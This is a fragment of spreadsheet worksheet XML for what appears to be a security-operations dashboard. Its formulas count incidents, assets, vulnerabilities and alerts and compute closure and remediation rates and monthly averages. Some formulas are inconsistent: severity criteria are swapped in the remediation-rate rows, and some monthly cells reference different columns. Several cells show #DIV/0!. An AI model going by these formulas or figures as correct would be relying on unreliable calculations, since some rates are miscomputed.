        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1,事件表!I:I,"已闭环")</f>
        <v>22</v>
      </c>
    </row>
    <row r="42" spans="2:7">
      <c r="B42" s="119"/>
      <c r="C42" s="93" t="s">
        <v>69</v>
      </c>
      <c r="D42" s="122">
        <f>COUNTIFS(资产表!F:F,"终端")</f>
        <v>950</v>
      </c>
      <c r="E42" s="122"/>
      <c r="F42" s="93" t="s">
        <v>94</v>
      </c>
      <c r="G42" s="117">
        <v>0</v>
      </c>
    </row>
    <row r="43" spans="2:7">
      <c r="B43" s="119"/>
      <c r="C43" s="93" t="s">
        <v>95</v>
      </c>
      <c r="D43" s="122">
        <f>COUNTIFS(资产漏洞表!E:E,"高危",资产漏洞表!F:F,"是")</f>
        <v>35</v>
      </c>
      <c r="E43" s="122"/>
      <c r="F43" s="93" t="s">
        <v>41</v>
      </c>
      <c r="G43" s="145">
        <f>I21</f>
        <v>13.9841666666667</v>
      </c>
    </row>
    <row r="44" spans="2:7">
      <c r="B44" s="121"/>
      <c r="C44" s="93" t="s">
        <v>96</v>
      </c>
      <c r="D44" s="117">
        <v>4</v>
      </c>
      <c r="G44" s="124"/>
    </row>
    <row r="45" spans="2:7">
      <c r="B45" s="118" t="s">
        <v>97</v>
      </c>
      <c r="C45" s="93" t="s">
        <v>98</v>
      </c>
      <c r="D45" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!I:I,"*已*",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)+COUNTIFS(事件表!A:A,"*事件*",事件表!I:I,"*不处置*",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)</f>
        <v>26</v>
      </c>
      <c r="G45" s="124"/>
    </row>
    <row r="46" spans="2:7">
      <c r="B46" s="119"/>
      <c r="C46" s="93" t="s">
        <v>99</v>
      </c>
      <c r="D46" s="122">
        <f>COUNTIFS(资产漏洞表!E:E,"高危",资产漏洞表!F:F,"是",资产漏洞表!P:P,"*已*")</f>
        <v>11</v>
      </c>
      <c r="G46" s="124"/>
    </row>
    <row r="47" spans="2:7">
      <c r="B47" s="119"/>
      <c r="C47" s="93" t="s">
        <v>100</v>
      </c>
      <c r="D47" s="122">
        <f>G9</f>
        <v>32</v>
      </c>
      <c r="G47" s="124"/>
    </row>
    <row r="48" spans="2:7">
      <c r="B48" s="121"/>
      <c r="C48" s="93" t="s">
        <v>101</v>
      </c>
      <c r="D48" s="122">
        <f>G10</f>
        <v>7</v>
      </c>
      <c r="E48" s="132"/>
      <c r="F48" s="132"/>
      <c r="G48" s="133"/>
    </row>
    <row r="49" spans="2:14">
      <c r="B49" s="160"/>
    </row>
    <row r="50" spans="2:14">
      <c r="B50" s="114" t="s">
        <v>102</v>
      </c>
      <c r="C50" s="122" t="s">
        <v>103</v>
      </c>
      <c r="D50" s="122" t="s">
        <v>104</v>
      </c>
      <c r="E50" s="93" t="s">
        <v>105</v>
      </c>
      <c r="F50" s="122" t="s">
        <v>40</v>
      </c>
      <c r="G50" s="135"/>
      <c r="H50" s="151"/>
      <c r="I50" s="135"/>
      <c r="J50" s="135"/>
      <c r="K50" s="135"/>
      <c r="L50" s="135"/>
      <c r="M50" s="135"/>
      <c r="N50" s="136"/>
    </row>
    <row r="51" spans="2:14">
      <c r="B51" s="114"/>
      <c r="C51" s="122">
        <f>COUNTIFS(事件表!A:A,"*事件*",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)</f>
        <v>26</v>
      </c>
      <c r="D51" s="145">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!BA:BA,"&lt;&gt;",事件表!AW:AW,"已通告",事件表!A:A,"*事件*")</f>
        <v>13.9841666666667</v>
      </c>
      <c r="E51" s="145">
        <f>AVERAGEIFS(事件表!BC:BC,事件表!BC:BC,"&lt;&gt;",事件表!AW:AW,"已通告",事件表!A:A,"*事件*")</f>
        <v>28937.155</v>
      </c>
      <c r="F51" s="161">
        <f>(COUNTIFS(事件表!A:A,"*事件*",事件表!I:I,"*已*",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)+COUNTIFS(事件表!A:A,"*事件*",事件表!I:I,"*不处置*",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1))/C51</f>
        <v>1</v>
      </c>
      <c r="H51" s="154"/>
      <c r="I51" s="155"/>
      <c r="J51" s="155"/>
      <c r="K51" s="155"/>
      <c r="L51" s="155"/>
      <c r="M51" s="155"/>
      <c r="N51" s="124"/>
    </row>
    <row r="52" spans="2:14">
      <c r="B52" s="147"/>
      <c r="H52" s="154"/>
      <c r="I52" s="155"/>
      <c r="J52" s="155"/>
      <c r="K52" s="155"/>
      <c r="L52" s="155"/>
      <c r="M52" s="155"/>
      <c r="N52" s="124"/>
    </row>
    <row r="53" spans="2:14">
      <c r="B53" s="114" t="s">
        <v>106</v>
      </c>
      <c r="C53" s="162" t="s">
        <v>107</v>
      </c>
      <c r="D53" s="122">
        <f>COUNTIFS(事件表!C:C,C53,事件表!A:A,"*事件*")</f>
        <v>4</v>
      </c>
      <c r="E53" s="114" t="s">
        <v>108</v>
      </c>
      <c r="F53" s="122" t="s">
        <v>86</v>
      </c>
      <c r="G53" s="163">
        <f>AVERAGEIFS(事件表!AZ:AZ,事件表!AZ:AZ,"&lt;&gt;",事件表!AW:AW,"已通告",事件表!A:A,"*事件*")</f>
        <v>5.11666666666667</v>
      </c>
      <c r="H53" s="154"/>
      <c r="I53" s="155"/>
      <c r="J53" s="155"/>
      <c r="K53" s="155"/>
      <c r="L53" s="155"/>
      <c r="M53" s="155"/>
      <c r="N53" s="124"/>
    </row>
    <row r="54" spans="2:14">
      <c r="B54" s="114"/>
      <c r="C54" s="164" t="s">
        <v>109</v>
      </c>
      <c r="D54" s="122">
        <f>COUNTIFS(事件表!C:C,C54,事件表!A:A,"*事件*")</f>
        <v>3</v>
      </c>
      <c r="E54" s="114"/>
      <c r="F54" s="122" t="s">
        <v>90</v>
      </c>
      <c r="G54" s="163">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!BA:BA,"&lt;&gt;",事件表!AW:AW,"已通告",事件表!A:A,"*事件*")</f>
        <v>13.9841666666667</v>
      </c>
      <c r="H54" s="154"/>
      <c r="I54" s="155"/>
      <c r="J54" s="155"/>
      <c r="K54" s="155"/>
      <c r="L54" s="155"/>
      <c r="M54" s="155"/>
      <c r="N54" s="124"/>
    </row>
    <row r="55" spans="2:14">
      <c r="B55" s="114"/>
      <c r="C55" s="164" t="s">
        <v>110</v>
      </c>
      <c r="D55" s="122">
        <f>COUNTIFS(事件表!C:C,C55,事件表!A:A,"*事件*")</f>
        <v>2</v>
      </c>
      <c r="E55" s="114"/>
      <c r="F55" s="122" t="s">
        <v>111</v>
      </c>
      <c r="G55" s="163">
        <f>AVERAGEIFS(事件表!BB:BB,事件表!BB:BB,"&lt;&gt;",事件表!AW:AW,"已通告",事件表!A:A,"*事件*")</f>
        <v>13.9841666666667</v>
      </c>
      <c r="H55" s="154"/>
      <c r="I55" s="155"/>
      <c r="J55" s="155"/>
      <c r="K55" s="155"/>
      <c r="L55" s="155"/>
      <c r="M55" s="155"/>
      <c r="N55" s="124"/>
    </row>
    <row r="56" spans="2:14">
      <c r="B56" s="114"/>
      <c r="C56" s="164" t="s">
        <v>112</v>
      </c>
      <c r="D56" s="122">
        <f>COUNTIFS(事件表!C:C,C56,事件表!A:A,"*事件*")</f>
        <v>2</v>
      </c>
      <c r="E56" s="114"/>
      <c r="F56" s="122" t="s">
        <v>113</v>
      </c>
      <c r="G56" s="163">
        <f>AVERAGEIFS(事件表!BC:BC,事件表!BC:BC,"&lt;&gt;",事件表!AW:AW,"已通告",事件表!A:A,"*事件*")</f>
        <v>28937.155</v>
      </c>
      <c r="H56" s="154"/>
      <c r="I56" s="155"/>
      <c r="J56" s="155"/>
      <c r="K56" s="155"/>
      <c r="L56" s="155"/>
      <c r="M56" s="155"/>
      <c r="N56" s="124"/>
    </row>
    <row r="57" spans="2:14">
      <c r="B57" s="114"/>
      <c r="C57" s="164" t="s">
        <v>114</v>
      </c>
      <c r="D57" s="122">
        <f>COUNTIFS(事件表!C:C,C57,事件表!A:A,"*事件*")</f>
        <v>1</v>
      </c>
      <c r="E57" s="114"/>
      <c r="F57" s="122" t="s">
        <v>115</v>
      </c>
      <c r="G57" s="163">
        <f>AVERAGEIFS(事件表!BD:BD,事件表!BD:BD,"&lt;&gt;",事件表!AW:AW,"已通告",事件表!A:A,"*事件*")</f>
        <v>36717.1425</v>
      </c>
      <c r="H57" s="154"/>
      <c r="I57" s="155"/>
      <c r="J57" s="155"/>
      <c r="K57" s="155"/>
      <c r="L57" s="155"/>
      <c r="M57" s="155"/>
      <c r="N57" s="124"/>
    </row>
    <row r="58" spans="2:14">
      <c r="B58" s="147"/>
      <c r="H58" s="154"/>
      <c r="I58" s="155"/>
      <c r="J58" s="155"/>
      <c r="K58" s="155"/>
      <c r="L58" s="155"/>
      <c r="M58" s="155"/>
      <c r="N58" s="124"/>
    </row>
    <row r="59" spans="2:14">
      <c r="B59" s="93" t="s">
        <v>116</v>
      </c>
      <c r="C59" s="93"/>
      <c r="D59" s="93"/>
      <c r="E59" s="93"/>
      <c r="F59" s="93"/>
      <c r="G59" s="165"/>
      <c r="H59" s="159"/>
      <c r="I59" s="132"/>
      <c r="J59" s="132"/>
      <c r="K59" s="132"/>
      <c r="L59" s="132"/>
      <c r="M59" s="132"/>
      <c r="N59" s="133"/>
    </row>
    <row r="60" spans="2:14">
      <c r="B60" s="93" t="s">
        <v>117</v>
      </c>
      <c r="C60" s="122" t="str">
        <f>TEXT(L1,"YYYY-MM")</f>
        <v>2025-08</v>
      </c>
      <c r="D60" s="115" t="str">
        <f>TEXT(DATE(YEAR(C60),MONTH(C60)+1,DAY(C60)),"YYYY-MM")</f>
        <v>2025-09</v>
      </c>
      <c r="E60" s="115" t="str">
        <f t="shared" ref="E60:N60" si="0">TEXT(DATE(YEAR(D60),MONTH(D60)+1,DAY(D60)),"YYYY-MM")</f>
        <v>2025-10</v>
      </c>
      <c r="F60" s="115" t="str">
        <f t="shared" si="0"/>
        <v>2025-11</v>
      </c>
      <c r="G60" s="115" t="str">
        <f t="shared" si="0"/>
        <v>2025-12</v>
      </c>
      <c r="H60" s="166" t="str">
        <f t="shared" si="0"/>
        <v>2026-01</v>
      </c>
      <c r="I60" s="166" t="str">
        <f t="shared" si="0"/>
        <v>2026-02</v>
      </c>
      <c r="J60" s="166" t="str">
        <f t="shared" si="0"/>
        <v>2026-03</v>
      </c>
      <c r="K60" s="166" t="str">
        <f t="shared" si="0"/>
        <v>2026-04</v>
      </c>
      <c r="L60" s="166" t="str">
        <f t="shared" si="0"/>
        <v>2026-05</v>
      </c>
      <c r="M60" s="166" t="str">
        <f t="shared" si="0"/>
        <v>2026-06</v>
      </c>
      <c r="N60" s="166" t="str">
        <f t="shared" si="0"/>
        <v>2026-07</v>
      </c>
    </row>
    <row r="61" spans="2:14">
      <c r="B61" s="93" t="s">
        <v>60</v>
      </c>
      <c r="C61" s="145">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!$B:$B,"&gt;="&amp;DATE(YEAR(C60),MONTH(C60),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(C60),MONTH(C60),DAY(EOMONTH(C60,0))))</f>
        <v>1.48866666666667</v>
      </c>
      <c r="D61" s="145">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!$B:$B,"&gt;="&amp;DATE(YEAR(D60),MONTH(D60),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(D60),MONTH(D60),DAY(EOMONTH(D60,0))))</f>
        <v>5.33</v>
      </c>
      <c r="E61" s="145">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!$B:$B,"&gt;="&amp;DATE(YEAR(E60),MONTH(E60),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(E60),MONTH(E60),DAY(EOMONTH(E60,0))))</f>
        <v>20.4566666666667</v>
      </c>
      <c r="F61" s="145">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!$B:$B,"&gt;="&amp;DATE(YEAR(F60),MONTH(F60),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(F60),MONTH(F60),DAY(EOMONTH(F60,0))))</f>
        <v>3.66363636363636</v>
      </c>
      <c r="G61" s="145">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!$B:$B,"&gt;="&amp;DATE(YEAR(G60),MONTH(G60),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(G60),MONTH(G60),DAY(EOMONTH(G60,0))))</f>
        <v>7</v>
      </c>
      <c r="H61" s="145">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!$B:$B,"&gt;="&amp;DATE(YEAR(H60),MONTH(H60),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(H60),MONTH(H60),DAY(EOMONTH(H60,0))))</f>
        <v>7.932</v>
      </c>
      <c r="I61" s="145">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!$B:$B,"&gt;="&amp;DATE(YEAR(I60),MONTH(I60),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(I60),MONTH(I60),DAY(EOMONTH(I60,0))))</f>
        <v>7.746</v>
      </c>
      <c r="J61" s="145">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!$B:$B,"&gt;="&amp;DATE(YEAR(J60),MONTH(J60),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(J60),MONTH(J60),DAY(EOMONTH(J60,0))))</f>
        <v>5.53</v>
      </c>
      <c r="K61" s="145" t="e">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!$B:$B,"&gt;="&amp;DATE(YEAR(K60),MONTH(K60),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(K60),MONTH(K60),DAY(EOMONTH(K60,0))))</f>
        <v>#DIV/0!</v>
      </c>
      <c r="L61" s="145" t="e">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!$B:$B,"&gt;="&amp;DATE(YEAR(L60),MONTH(L60),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(L60),MONTH(L60),DAY(EOMONTH(L60,0))))</f>
        <v>#DIV/0!</v>
      </c>
      <c r="M61" s="145" t="e">
        <f>AVERAGEIFS(事件表!BB:BB,事件表!$B:$B,"&gt;="&amp;DATE(YEAR(M60),MONTH(M60),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(M60),MONTH(M60),DAY(EOMONTH(M60,0))))</f>
        <v>#DIV/0!</v>
      </c>
      <c r="N61" s="145" t="e">
        <f>AVERAGEIFS(事件表!BC:BC,事件表!$B:$B,"&gt;="&amp;DATE(YEAR(N60),MONTH(N60),1),事件表!$B:$B,"&lt;="&amp;DATE(YEAR(N60),MONTH(N60),DAY(EOMONTH(N60,0))))</f>
        <v>#DIV/0!</v>
      </c>
    </row>
    <row r="62" spans="2:14">
      <c r="B62" s="160"/>
    </row>
    <row r="64" spans="2:14">
      <c r="B64" s="114" t="s">
        <v>118</v>
      </c>
      <c r="C64" s="167" t="s">
        <v>119</v>
      </c>
      <c r="D64" s="122">
        <f>COUNTIFS(资产表!F:F,"服务器")</f>
        <v>160</v>
      </c>
      <c r="E64" s="122" t="s">
        <v>120</v>
      </c>
      <c r="F64" s="93" t="s">
        <v>121</v>
      </c>
      <c r="G64" s="122">
        <f>COUNTIFS(资产表!F:F,"服务器")</f>
        <v>160</v>
      </c>
    </row>
    <row r="65" spans="2:18">
      <c r="B65" s="118" t="s">
        <v>122</v>
      </c>
      <c r="C65" s="93" t="s">
        <v>69</v>
      </c>
      <c r="D65" s="122">
        <f>COUNTIFS(资产表!F:F,"终端")</f>
        <v>950</v>
      </c>
      <c r="E65" s="122"/>
      <c r="F65" s="93" t="s">
        <v>123</v>
      </c>
      <c r="G65" s="122">
        <f>COUNTIFS(资产表!F:F,"终端")</f>
        <v>950</v>
      </c>
    </row>
    <row r="66" spans="2:18">
      <c r="B66" s="119"/>
      <c r="C66" s="168" t="s">
        <v>124</v>
      </c>
      <c r="D66" s="122">
        <f>暴露面!E2+暴露面!E3+暴露面!E4</f>
        <v>11</v>
      </c>
      <c r="E66" s="122"/>
      <c r="F66" s="93" t="s">
        <v>125</v>
      </c>
      <c r="G66" s="122">
        <f>COUNTIFS(资产表!F:F,"网络设备")</f>
        <v>68</v>
      </c>
    </row>
    <row r="67" spans="2:18">
      <c r="B67" s="119"/>
      <c r="C67" s="93" t="s">
        <v>126</v>
      </c>
      <c r="D67" s="122">
        <f>暴露面!E5</f>
        <v>27</v>
      </c>
      <c r="E67" s="122"/>
      <c r="F67" s="93" t="s">
        <v>127</v>
      </c>
      <c r="G67" s="122">
        <f>COUNTIFS(资产表!F:F,"安全设备")+COUNTIFS(资产表!F:F,"堡垒机")+COUNTIFS(资产表!F:F,"扫描器")</f>
        <v>27</v>
      </c>
    </row>
    <row r="68" spans="2:18">
      <c r="B68" s="121"/>
      <c r="C68" s="93" t="s">
        <v>128</v>
      </c>
      <c r="D68" s="117">
        <v>12</v>
      </c>
      <c r="E68" s="122"/>
      <c r="F68" s="93" t="s">
        <v>129</v>
      </c>
      <c r="G68" s="122">
        <f>COUNTIFS(资产表!F:F,"物联网设备")</f>
        <v>1250</v>
      </c>
    </row>
    <row r="69" spans="2:18">
      <c r="B69" s="147"/>
      <c r="G69" s="124"/>
    </row>
    <row r="70" ht="24" customHeight="1" spans="2:18">
      <c r="B70" s="169" t="s">
        <v>130</v>
      </c>
      <c r="C70" s="142" t="s">
        <v>131</v>
      </c>
      <c r="D70" s="152">
        <f>COUNTIFS(资产表!F:F,"服务器",资产表!AG:AG,"内网")</f>
        <v>135</v>
      </c>
      <c r="E70" s="169" t="s">
        <v>132</v>
      </c>
      <c r="F70" s="142" t="s">
        <v>133</v>
      </c>
      <c r="G70" s="123">
        <f>COUNTIFS(资产表!F:F,"服务器",资产表!AG:AG,"外网")</f>
        <v>25</v>
      </c>
    </row>
    <row r="71" spans="2:18">
      <c r="B71" s="170"/>
      <c r="C71" s="142" t="s">
        <v>134</v>
      </c>
      <c r="D71" s="152">
        <f>COUNTIFS(资产表!F:F,"终端",资产表!AG:AG,"内网")</f>
        <v>948</v>
      </c>
      <c r="E71" s="170"/>
      <c r="F71" s="142" t="s">
        <v>135</v>
      </c>
      <c r="G71" s="123">
        <f>暴露面!E2+暴露面!E4</f>
        <v>4</v>
      </c>
    </row>
    <row r="72" spans="2:18">
      <c r="B72" s="170"/>
      <c r="C72" s="142" t="s">
        <v>136</v>
      </c>
      <c r="D72" s="152">
        <f>COUNTIFS(资产表!F:F,"网络设备",资产表!AG:AG,"内网")+COUNTIFS(资产表!F:F,"安全设备",资产表!AG:AG,"内网")+COUNTIFS(资产表!F:F,"堡垒机",资产表!AG:AG,"内网")+COUNTIFS(资产表!F:F,"扫描器",资产表!AG:AG,"内网")</f>
        <v>92</v>
      </c>
      <c r="E72" s="170"/>
      <c r="F72" s="142" t="s">
        <v>137</v>
      </c>
      <c r="G72" s="123">
        <f>暴露面!E6</f>
        <v>20</v>
      </c>
    </row>
    <row r="73" spans="2:18">
      <c r="B73" s="170"/>
      <c r="C73" s="142" t="s">
        <v>138</v>
      </c>
      <c r="D73" s="152">
        <f>COUNTIFS(资产表!F:F,"物联网设备",资产表!AG:AG,"内网")</f>
        <v>1250</v>
      </c>
      <c r="E73" s="170"/>
      <c r="F73" s="142" t="s">
        <v>139</v>
      </c>
      <c r="G73" s="123">
        <f>暴露面!E7</f>
        <v>7</v>
      </c>
    </row>
    <row r="74" s="5" customFormat="1" spans="2:18">
      <c r="B74" s="171"/>
      <c r="C74" s="172" t="s">
        <v>140</v>
      </c>
      <c r="D74" s="152">
        <f>COUNTIFS(资产表!E:E,"*服务内*")</f>
        <v>126</v>
      </c>
      <c r="E74" s="171"/>
      <c r="F74" s="172" t="s">
        <v>141</v>
      </c>
      <c r="G74" s="117">
        <v>12</v>
      </c>
      <c r="I74"/>
      <c r="J74"/>
      <c r="K74"/>
      <c r="L74"/>
      <c r="M74"/>
      <c r="N74"/>
      <c r="O74"/>
      <c r="P74"/>
      <c r="Q74"/>
      <c r="R74" s="173"/>
    </row>
    <row r="76" ht="28.8" spans="2:18">
      <c r="B76" s="122" t="s">
        <v>142</v>
      </c>
      <c r="C76" s="174" t="s">
        <v>95</v>
      </c>
      <c r="D76" s="114" t="s">
        <v>143</v>
      </c>
      <c r="E76" s="122" t="s">
        <v>144</v>
      </c>
      <c r="F76" s="122" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="77" spans="2:18">
      <c r="B77" s="122"/>
      <c r="C77" s="174">
        <f>COUNTIFS(资产漏洞表!E:E,"高危",资产漏洞表!F:F,"是",资产漏洞表!T:T,"&gt;="&amp;L1,资产漏洞表!T:T,"&lt;="&amp;M1)</f>
        <v>25</v>
      </c>
      <c r="D77" s="122">
        <f>COUNTIFS(资产漏洞表!N:N,"外网",资产漏洞表!P:P,"*已*",资产漏洞表!T:T,"&gt;="&amp;L1,资产漏洞表!T:T,"&lt;="&amp;M1)</f>
        <v>184</v>
      </c>
      <c r="E77" s="117">
        <v>62</v>
      </c>
      <c r="F77" s="161">
        <f>COUNTIFS(资产漏洞表!E:E,"高危",资产漏洞表!F:F,"是",资产漏洞表!P:P,"*已*")/COUNTIFS(资产漏洞表!E:E,"高危",资产漏洞表!F:F,"是")</f>
        <v>0.314285714285714</v>
      </c>
    </row>
    <row r="78" spans="2:18">
      <c r="B78" s="122"/>
      <c r="F78" s="124"/>
    </row>
    <row r="79" spans="2:18">
      <c r="B79" s="122" t="s">
        <v>146</v>
      </c>
      <c r="C79" s="175"/>
      <c r="D79" s="122" t="s">
        <v>147</v>
      </c>
      <c r="E79" s="122" t="s">
        <v>148</v>
      </c>
      <c r="F79" s="122" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="80" spans="2:18">
      <c r="B80" s="122"/>
      <c r="C80" s="93" t="s">
        <v>150</v>
      </c>
      <c r="D80" s="122">
        <f>COUNTIFS(资产漏洞表!E:E,"高危")</f>
        <v>2582</v>
      </c>
      <c r="E80" s="122">
        <f>COUNTIFS(资产漏洞表!E:E,"中危",资产漏洞表!P:P,"*已*")</f>
        <v>220</v>
      </c>
      <c r="F80" s="161">
        <f>E80/D80</f>
        <v>0.0852052672347018</v>
      </c>
    </row>
    <row r="81" spans="2:14">
      <c r="B81" s="122"/>
      <c r="C81" s="93" t="s">
        <v>151</v>
      </c>
      <c r="D81" s="122">
        <f>COUNTIFS(资产漏洞表!E:E,"中危")</f>
        <v>3678</v>
      </c>
      <c r="E81" s="122">
        <f>COUNTIFS(资产漏洞表!E:E,"中危",资产漏洞表!P:P,"*已*")</f>
        <v>220</v>
      </c>
      <c r="F81" s="161">
        <f>E81/D81</f>
        <v>0.0598151169113649</v>
      </c>
    </row>
    <row r="82" spans="2:14">
      <c r="B82" s="122"/>
      <c r="C82" s="93" t="s">
        <v>152</v>
      </c>
      <c r="D82" s="122">
        <f>COUNTIFS(资产漏洞表!E:E,"低危")</f>
        <v>3194</v>
      </c>
      <c r="E82" s="122">
        <f>COUNTIFS(资产漏洞表!E:E,"高危",资产漏洞表!P:P,"*已*")</f>
        <v>325</v>
      </c>
      <c r="F82" s="161">
        <f>E82/D82</f>
        <v>0.101753287413901</v>
      </c>
    </row>
    <row r="84" ht="30" customHeight="1" spans="2:14">
      <c r="B84" s="93" t="s">
        <v>153</v>
      </c>
      <c r="C84" s="93" t="s">
        <v>154</v>
      </c>
      <c r="D84" s="117">
        <v>65545</v>
      </c>
      <c r="E84" s="135"/>
      <c r="F84" s="176" t="s">
        <v>155</v>
      </c>
      <c r="G84" s="177" t="s">
        <v>156</v>
      </c>
      <c r="H84" s="178"/>
      <c r="I84" s="176" t="s">
        <v>157</v>
      </c>
      <c r="J84" s="177" t="s">
        <v>156</v>
      </c>
      <c r="K84" s="178"/>
      <c r="L84" s="176" t="s">
        <v>158</v>
      </c>
      <c r="M84" s="179" t="s">
        <v>159</v>
      </c>
      <c r="N84" s="136"/>
    </row>
    <row r="85" ht="27" customHeight="1" spans="2:14">
      <c r="B85" s="122" t="s">
        <v>160</v>
      </c>
      <c r="C85" s="93" t="s">
        <v>161</v>
      </c>
      <c r="D85" s="122">
        <f>COUNTIFS(告警表!D:D,"*威胁*")</f>
        <v>515</v>
      </c>
      <c r="F85" s="180" t="s">
        <v>162</v>
      </c>
      <c r="G85" s="181">
        <v>2064</v>
      </c>
      <c r="H85" s="182"/>
      <c r="I85" s="180" t="s">
        <v>163</v>
      </c>
      <c r="J85" s="181">
        <v>1254</v>
      </c>
      <c r="K85" s="182"/>
      <c r="L85" s="183" t="s">
        <v>164</v>
      </c>
      <c r="M85" s="184">
        <v>2684</v>
      </c>
      <c r="N85" s="124"/>
    </row>
    <row r="86" ht="27" customHeight="1" spans="2:14">
      <c r="B86" s="122"/>
      <c r="C86" s="93" t="s">
        <v>165</v>
      </c>
      <c r="D86" s="122">
        <f>COUNTIFS(事件表!A:A,"重大威胁",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)+COUNTIFS(事件表!A:A,"一般威胁",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)</f>
        <v>3</v>
      </c>
      <c r="F86" s="180" t="s">
        <v>166</v>
      </c>
      <c r="G86" s="181">
        <v>726</v>
      </c>
      <c r="H86" s="182"/>
      <c r="I86" s="180" t="s">
        <v>167</v>
      </c>
      <c r="J86" s="181">
        <v>1242</v>
      </c>
      <c r="K86" s="182"/>
      <c r="L86" s="183" t="s">
        <v>168</v>
      </c>
      <c r="M86" s="184">
        <v>2337</v>
      </c>
      <c r="N86" s="124"/>
    </row>
    <row r="87" ht="27" customHeight="1" spans="2:14">
      <c r="B87" s="122"/>
      <c r="C87" s="93" t="s">
        <v>169</v>
      </c>
      <c r="D87" s="122">
        <f>AVERAGEIFS(事件表!BA:BA,事件表!BA:BA,"&lt;&gt;",事件表!AW:AW,"已通告",事件表!A:A,"*威胁*")</f>
        <v>3.54</v>
      </c>
      <c r="F87" s="180" t="s">
        <v>170</v>
      </c>
      <c r="G87" s="181">
        <v>582</v>
      </c>
      <c r="H87" s="182"/>
      <c r="I87" s="180" t="s">
        <v>171</v>
      </c>
      <c r="J87" s="181">
        <v>735</v>
      </c>
      <c r="K87" s="182"/>
      <c r="L87" s="183" t="s">
        <v>172</v>
      </c>
      <c r="M87" s="184">
        <v>204</v>
      </c>
      <c r="N87" s="124"/>
    </row>
    <row r="88" ht="27" customHeight="1" spans="2:14">
      <c r="B88" s="122" t="s">
        <v>173</v>
      </c>
      <c r="C88" s="93" t="s">
        <v>174</v>
      </c>
      <c r="D88" s="117">
        <v>2</v>
      </c>
      <c r="F88" s="180" t="s">
        <v>175</v>
      </c>
      <c r="G88" s="181">
        <v>327</v>
      </c>
      <c r="H88" s="182"/>
      <c r="I88" s="176" t="s">
        <v>176</v>
      </c>
      <c r="J88" s="177">
        <v>423</v>
      </c>
      <c r="K88" s="182"/>
      <c r="L88" s="183" t="s">
        <v>177</v>
      </c>
      <c r="M88" s="184">
        <v>9</v>
      </c>
      <c r="N88" s="124"/>
    </row>
    <row r="89" ht="27" customHeight="1" spans="2:14">
      <c r="B89" s="122"/>
      <c r="C89" s="93" t="s">
        <v>178</v>
      </c>
      <c r="D89" s="117">
        <v>0</v>
      </c>
      <c r="F89" s="180" t="s">
        <v>179</v>
      </c>
      <c r="G89" s="181">
        <v>259</v>
      </c>
      <c r="H89" s="182"/>
      <c r="I89" s="180" t="s">
        <v>180</v>
      </c>
      <c r="J89" s="181">
        <v>341</v>
      </c>
      <c r="K89" s="182"/>
      <c r="L89" s="183" t="s">
        <v>181</v>
      </c>
      <c r="M89" s="184">
        <v>7</v>
      </c>
      <c r="N89" s="124"/>
    </row>
    <row r="90" ht="27" customHeight="1" spans="2:14">
      <c r="B90" s="122" t="s">
        <v>182</v>
      </c>
      <c r="C90" s="93" t="s">
        <v>183</v>
      </c>
      <c r="D90" s="122">
        <f>COUNTIFS(事件表!A:A,"最新威胁",事件表!B:B,"&gt;="&amp;L1,事件表!B:B,"&lt;="&amp;M1)</f>
        <v>109</v>
      </c>
      <c r="N90" s="124"/>
    </row>
    <row r="91" ht="27" customHeight="1" spans="2:14">
      <c r="B91" s="122"/>
      <c r="C91" s="93" t="s">
        <v>184</v>
      </c>
      <c r="D91" s="117">
        <v>15</v>
      </c>
      <c r="N91" s="124"/>
    </row>
    <row r="92" spans="2:14">
      <c r="B92" s="154"/>
      <c r="N92" s="124"/>
    </row>
    <row r="93" spans="2:14">
      <c r="B93" s="185" t="s">
        <v>185</v>
      </c>
      <c r="C93" s="186"/>
      <c r="D93" s="186"/>
      <c r="E93" s="186"/>
      <c r="F93" s="186"/>
      <c r="G93" s="186"/>
      <c r="H93" s="186"/>
      <c r="I93" s="186"/>
      <c r="J93" s="186"/>
      <c r="K93" s="186"/>
      <c r="L93" s="186"/>
      <c r="M93" s="186"/>
      <c r="N93" s="187"/>
    </row>
    <row r="94" spans="2:14">
      <c r="B94" s="122"/>
      <c r="C94" s="122" t="str">
        <f>TEXT(L1,"YYYY-MM")</f>
        <v>2025-08</v>
      </c>
      <c r="D94" s="115" t="str">
        <f t="shared" ref="D94:N94" si="1">TEXT(DATE(YEAR(C94),MONTH(C94)+1,DAY(C94)),"YYYY-MM")</f>
        <v>2025-09</v>
      </c>
      <c r="E94" s="115" t="str">
        <f t="shared" si="1"/>
        <v>2025-10</v>
      </c>
      <c r="F94" s="115" t="str">
        <f t="shared" si="1"/>
